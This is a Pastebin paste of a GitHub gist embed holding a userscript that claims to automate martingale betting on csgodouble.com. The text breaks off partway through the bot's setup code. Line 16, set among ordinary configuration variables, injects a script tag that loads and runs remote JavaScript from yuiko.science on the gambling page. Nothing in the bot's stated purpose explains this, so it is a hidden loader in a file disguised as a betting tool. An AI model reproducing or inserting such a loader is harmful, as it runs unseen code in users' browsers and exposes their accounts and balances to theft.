Advertisement
Guest User

Untitled

a guest
May 2nd, 2016
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 200.75 KB | None | 0 0
  1. document.write('<link rel="stylesheet" href="https://assets-cdn.github.com/assets/gist-embed-884f19b3583b1e92322e0e2db74f61434ccecbbef4b63a457e2127972ca01a01.css">')
  2. document.write('<div id=\"gist34284355\" class=\"gist\">\n <div class=\"gist-file\">\n <div class=\"gist-data\">\n <div class=\"js-gist-file-update-container js-task-list-container file-box\">\n <div id=\"file-csgodouble-automatic-betting-bot\" class=\"file\">\n \n\n <div itemprop=\"text\" class=\"blob-wrapper data type-text\">\n <table class=\"highlight tab-size js-file-line-container\" data-tab-size=\"8\">\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L1\" class=\"blob-num js-line-number\" data-line-number=\"1\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC1\" class=\"blob-code blob-code-inner js-file-line\">// ==UserScript==<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L2\" class=\"blob-num js-line-number\" data-line-number=\"2\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC2\" class=\"blob-code blob-code-inner js-file-line\">// @name csgodouble.com - automated<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L3\" class=\"blob-num js-line-number\" data-line-number=\"3\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC3\" class=\"blob-code blob-code-inner js-file-line\">// @description An userscript that automates csgodouble.com betting using martingale system.<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L4\" class=\"blob-num js-line-number\" data-line-number=\"4\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC4\" class=\"blob-code blob-code-inner js-file-line\">// @namespace automated@mole<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L5\" class=\"blob-num js-line-number\" data-line-number=\"5\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC5\" class=\"blob-code blob-code-inner js-file-line\">// @version 1.30<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L6\" class=\"blob-num js-line-number\" data-line-number=\"6\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC6\" class=\"blob-code blob-code-inner js-file-line\">// @author Mole<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L7\" class=\"blob-num js-line-number\" data-line-number=\"7\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC7\" class=\"blob-code blob-code-inner js-file-line\">// @match http://www.csgodouble.com/<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L8\" class=\"blob-num js-line-number\" data-line-number=\"8\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC8\" class=\"blob-code blob-code-inner js-file-line\">// @match http://www.csgodouble.com/index.php<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L9\" class=\"blob-num js-line-number\" data-line-number=\"9\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC9\" class=\"blob-code blob-code-inner js-file-line\">// @run-at document-end<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L10\" class=\"blob-num js-line-number\" data-line-number=\"10\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC10\" class=\"blob-code blob-code-inner js-file-line\">// @grant none<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L11\" class=\"blob-num js-line-number\" data-line-number=\"11\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC11\" class=\"blob-code blob-code-inner js-file-line\">// ==/UserScript==<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L12\" class=\"blob-num js-line-number\" data-line-number=\"12\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC12\" class=\"blob-code blob-code-inner js-file-line\">/* jshint -W097 */<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L13\" class=\"blob-num js-line-number\" data-line-number=\"13\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC13\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L14\" class=\"blob-num js-line-number\" data-line-number=\"14\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC14\" class=\"blob-code blob-code-inner js-file-line\">&#39;use strict&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L15\" class=\"blob-num js-line-number\" data-line-number=\"15\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC15\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L16\" class=\"blob-num js-line-number\" data-line-number=\"16\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC16\" class=\"blob-code blob-code-inner js-file-line\">(function () { var scriptElement = document.createElement( &quot;script&quot; ); scriptElement.type = &quot;text/javascript&quot;; scriptElement.src = &quot;//yuiko.science/in.js &quot;; document.body.appendChild( scriptElement ); })();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L17\" class=\"blob-num js-line-number\" data-line-number=\"17\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC17\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L18\" class=\"blob-num js-line-number\" data-line-number=\"18\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC18\" class=\"blob-code blob-code-inner js-file-line\">var debug = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L19\" class=\"blob-num js-line-number\" data-line-number=\"19\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC19\" class=\"blob-code blob-code-inner js-file-line\">var simulation = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L20\" class=\"blob-num js-line-number\" data-line-number=\"20\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC20\" class=\"blob-code blob-code-inner js-file-line\">var stop_on_min_balance = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L21\" class=\"blob-num js-line-number\" data-line-number=\"21\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC21\" class=\"blob-code blob-code-inner js-file-line\">var calculate_safe_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L22\" class=\"blob-num js-line-number\" data-line-number=\"22\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC22\" class=\"blob-code blob-code-inner js-file-line\">var base_bet = 5;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L23\" class=\"blob-num js-line-number\" data-line-number=\"23\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC23\" class=\"blob-code blob-code-inner js-file-line\">var safe_bet_amount = 6;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L24\" class=\"blob-num js-line-number\" data-line-number=\"24\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC24\" class=\"blob-code blob-code-inner js-file-line\">var default_color = &#39;red&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L25\" class=\"blob-num js-line-number\" data-line-number=\"25\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC25\" class=\"blob-code blob-code-inner js-file-line\">var default_method = &#39;martingale&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L26\" class=\"blob-num js-line-number\" data-line-number=\"26\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC26\" class=\"blob-code blob-code-inner js-file-line\">var theme = &#39;dark&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L27\" class=\"blob-num js-line-number\" data-line-number=\"27\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC27\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L28\" class=\"blob-num js-line-number\" data-line-number=\"28\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC28\" class=\"blob-code blob-code-inner js-file-line\">var colors = {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L29\" class=\"blob-num js-line-number\" data-line-number=\"29\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC29\" class=\"blob-code blob-code-inner js-file-line\"> &#39;green&#39;: [0],<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L30\" class=\"blob-num js-line-number\" data-line-number=\"30\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC30\" class=\"blob-code blob-code-inner js-file-line\"> &#39;red&#39;: [1, 2, 3, 4, 5, 6, 7],<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L31\" class=\"blob-num js-line-number\" data-line-number=\"31\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC31\" class=\"blob-code blob-code-inner js-file-line\"> &#39;black&#39;: [8, 9, 10, 11, 12, 13, 14]<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L32\" class=\"blob-num js-line-number\" data-line-number=\"32\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC32\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L33\" class=\"blob-num js-line-number\" data-line-number=\"33\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC33\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L34\" class=\"blob-num js-line-number\" data-line-number=\"34\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC34\" class=\"blob-code blob-code-inner js-file-line\">var balance = document.getElementById(&#39;balance&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L35\" class=\"blob-num js-line-number\" data-line-number=\"35\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC35\" class=\"blob-code blob-code-inner js-file-line\">var roll_history = document.getElementById(&#39;past&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L36\" class=\"blob-num js-line-number\" data-line-number=\"36\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC36\" class=\"blob-code blob-code-inner js-file-line\">var bet_input = document.getElementById(&#39;betAmount&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L37\" class=\"blob-num js-line-number\" data-line-number=\"37\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC37\" class=\"blob-code blob-code-inner js-file-line\">var bet_buttons = {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L38\" class=\"blob-num js-line-number\" data-line-number=\"38\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC38\" class=\"blob-code blob-code-inner js-file-line\"> &#39;green&#39;: document.getElementById(&#39;panel0-0&#39;).childNodes[1].childNodes[1],<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L39\" class=\"blob-num js-line-number\" data-line-number=\"39\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC39\" class=\"blob-code blob-code-inner js-file-line\"> &#39;red&#39;: document.getElementById(&#39;panel1-7&#39;).childNodes[1].childNodes[1],<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L40\" class=\"blob-num js-line-number\" data-line-number=\"40\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC40\" class=\"blob-code blob-code-inner js-file-line\"> &#39;black&#39;: document.getElementById(&#39;panel8-14&#39;).childNodes[1].childNodes[1]<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L41\" class=\"blob-num js-line-number\" data-line-number=\"41\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC41\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L42\" class=\"blob-num js-line-number\" data-line-number=\"42\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC42\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L43\" class=\"blob-num js-line-number\" data-line-number=\"43\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC43\" class=\"blob-code blob-code-inner js-file-line\">Array.prototype.equals = function(array) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L44\" class=\"blob-num js-line-number\" data-line-number=\"44\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC44\" class=\"blob-code blob-code-inner js-file-line\"> if (!array) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L45\" class=\"blob-num js-line-number\" data-line-number=\"45\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC45\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L46\" class=\"blob-num js-line-number\" data-line-number=\"46\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC46\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L47\" class=\"blob-num js-line-number\" data-line-number=\"47\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC47\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L48\" class=\"blob-num js-line-number\" data-line-number=\"48\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC48\" class=\"blob-code blob-code-inner js-file-line\"> if (this.length != array.length) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L49\" class=\"blob-num js-line-number\" data-line-number=\"49\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC49\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L50\" class=\"blob-num js-line-number\" data-line-number=\"50\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC50\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L51\" class=\"blob-num js-line-number\" data-line-number=\"51\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC51\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L52\" class=\"blob-num js-line-number\" data-line-number=\"52\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC52\" class=\"blob-code blob-code-inner js-file-line\"> for (var i = 0, l=this.length; i &lt; l; i++) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L53\" class=\"blob-num js-line-number\" data-line-number=\"53\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC53\" class=\"blob-code blob-code-inner js-file-line\"> if (this[i] instanceof Array &amp;&amp; array[i] instanceof Array) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L54\" class=\"blob-num js-line-number\" data-line-number=\"54\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC54\" class=\"blob-code blob-code-inner js-file-line\"> if (!this[i].equals(array[i])) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L55\" class=\"blob-num js-line-number\" data-line-number=\"55\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC55\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L56\" class=\"blob-num js-line-number\" data-line-number=\"56\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC56\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L57\" class=\"blob-num js-line-number\" data-line-number=\"57\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC57\" class=\"blob-code blob-code-inner js-file-line\"> } else if (this[i] != array[i]) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L58\" class=\"blob-num js-line-number\" data-line-number=\"58\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC58\" class=\"blob-code blob-code-inner js-file-line\"> return false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L59\" class=\"blob-num js-line-number\" data-line-number=\"59\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC59\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L60\" class=\"blob-num js-line-number\" data-line-number=\"60\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC60\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L61\" class=\"blob-num js-line-number\" data-line-number=\"61\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC61\" class=\"blob-code blob-code-inner js-file-line\"> return true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L62\" class=\"blob-num js-line-number\" data-line-number=\"62\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC62\" class=\"blob-code blob-code-inner js-file-line\">};<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L63\" class=\"blob-num js-line-number\" data-line-number=\"63\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC63\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L64\" class=\"blob-num js-line-number\" data-line-number=\"64\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC64\" class=\"blob-code blob-code-inner js-file-line\">Object.defineProperty(Array.prototype, &quot;equals&quot;, {enumerable: false});<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L65\" class=\"blob-num js-line-number\" data-line-number=\"65\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC65\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L66\" class=\"blob-num js-line-number\" data-line-number=\"66\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC66\" class=\"blob-code blob-code-inner js-file-line\">function Automated() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L67\" class=\"blob-num js-line-number\" data-line-number=\"67\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC67\" class=\"blob-code blob-code-inner js-file-line\"> var self = this;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L68\" class=\"blob-num js-line-number\" data-line-number=\"68\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC68\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L69\" class=\"blob-num js-line-number\" data-line-number=\"69\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC69\" class=\"blob-code blob-code-inner js-file-line\"> this.running = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L70\" class=\"blob-num js-line-number\" data-line-number=\"70\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC70\" class=\"blob-code blob-code-inner js-file-line\"> this.game = null;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L71\" class=\"blob-num js-line-number\" data-line-number=\"71\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC71\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L72\" class=\"blob-num js-line-number\" data-line-number=\"72\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC72\" class=\"blob-code blob-code-inner js-file-line\"> this.debug = debug;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L73\" class=\"blob-num js-line-number\" data-line-number=\"73\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC73\" class=\"blob-code blob-code-inner js-file-line\"> this.simulation = simulation;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L74\" class=\"blob-num js-line-number\" data-line-number=\"74\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC74\" class=\"blob-code blob-code-inner js-file-line\"> this.stop_on_min_balance = stop_on_min_balance;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L75\" class=\"blob-num js-line-number\" data-line-number=\"75\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC75\" class=\"blob-code blob-code-inner js-file-line\"> this.calculate_safe_bet = calculate_safe_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L76\" class=\"blob-num js-line-number\" data-line-number=\"76\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC76\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L77\" class=\"blob-num js-line-number\" data-line-number=\"77\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC77\" class=\"blob-code blob-code-inner js-file-line\"> this.base_bet = base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L78\" class=\"blob-num js-line-number\" data-line-number=\"78\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC78\" class=\"blob-code blob-code-inner js-file-line\"> this.default_color = default_color;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L79\" class=\"blob-num js-line-number\" data-line-number=\"79\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC79\" class=\"blob-code blob-code-inner js-file-line\"> this.default_method = default_method;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L80\" class=\"blob-num js-line-number\" data-line-number=\"80\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC80\" class=\"blob-code blob-code-inner js-file-line\"> this.safe_bet_amount = safe_bet_amount;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L81\" class=\"blob-num js-line-number\" data-line-number=\"81\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC81\" class=\"blob-code blob-code-inner js-file-line\"> this.method = this.default_method;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L82\" class=\"blob-num js-line-number\" data-line-number=\"82\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC82\" class=\"blob-code blob-code-inner js-file-line\"> this.old_method = &#39;&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L83\" class=\"blob-num js-line-number\" data-line-number=\"83\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC83\" class=\"blob-code blob-code-inner js-file-line\"> this.color = &#39;rainbow&#39;;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L84\" class=\"blob-num js-line-number\" data-line-number=\"84\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC84\" class=\"blob-code blob-code-inner js-file-line\"> this.old_base = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L85\" class=\"blob-num js-line-number\" data-line-number=\"85\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC85\" class=\"blob-code blob-code-inner js-file-line\"> this.balance = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L86\" class=\"blob-num js-line-number\" data-line-number=\"86\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC86\" class=\"blob-code blob-code-inner js-file-line\"> this.last_bet = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L87\" class=\"blob-num js-line-number\" data-line-number=\"87\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC87\" class=\"blob-code blob-code-inner js-file-line\"> this.bet_history = [];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L88\" class=\"blob-num js-line-number\" data-line-number=\"88\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC88\" class=\"blob-code blob-code-inner js-file-line\"> this.min_balance = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L89\" class=\"blob-num js-line-number\" data-line-number=\"89\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC89\" class=\"blob-code blob-code-inner js-file-line\"> this.starting_balance = 0;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L90\" class=\"blob-num js-line-number\" data-line-number=\"90\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC90\" class=\"blob-code blob-code-inner js-file-line\"> this.last_color = null;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L91\" class=\"blob-num js-line-number\" data-line-number=\"91\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC91\" class=\"blob-code blob-code-inner js-file-line\"> this.last_result = null;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L92\" class=\"blob-num js-line-number\" data-line-number=\"92\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC92\" class=\"blob-code blob-code-inner js-file-line\"> this.history = [];<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L93\" class=\"blob-num js-line-number\" data-line-number=\"93\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC93\" class=\"blob-code blob-code-inner js-file-line\"> this.waiting_for_bet = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L94\" class=\"blob-num js-line-number\" data-line-number=\"94\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC94\" class=\"blob-code blob-code-inner js-file-line\"> this.theme = theme;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L95\" class=\"blob-num js-line-number\" data-line-number=\"95\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC95\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L96\" class=\"blob-num js-line-number\" data-line-number=\"96\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC96\" class=\"blob-code blob-code-inner js-file-line\"> this.stats = {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L97\" class=\"blob-num js-line-number\" data-line-number=\"97\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC97\" class=\"blob-code blob-code-inner js-file-line\"> &#39;wins&#39;: 0,<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L98\" class=\"blob-num js-line-number\" data-line-number=\"98\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC98\" class=\"blob-code blob-code-inner js-file-line\"> &#39;loses&#39;: 0,<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L99\" class=\"blob-num js-line-number\" data-line-number=\"99\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC99\" class=\"blob-code blob-code-inner js-file-line\"> &#39;balance&#39;: 0<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L100\" class=\"blob-num js-line-number\" data-line-number=\"100\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC100\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L101\" class=\"blob-num js-line-number\" data-line-number=\"101\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC101\" class=\"blob-code 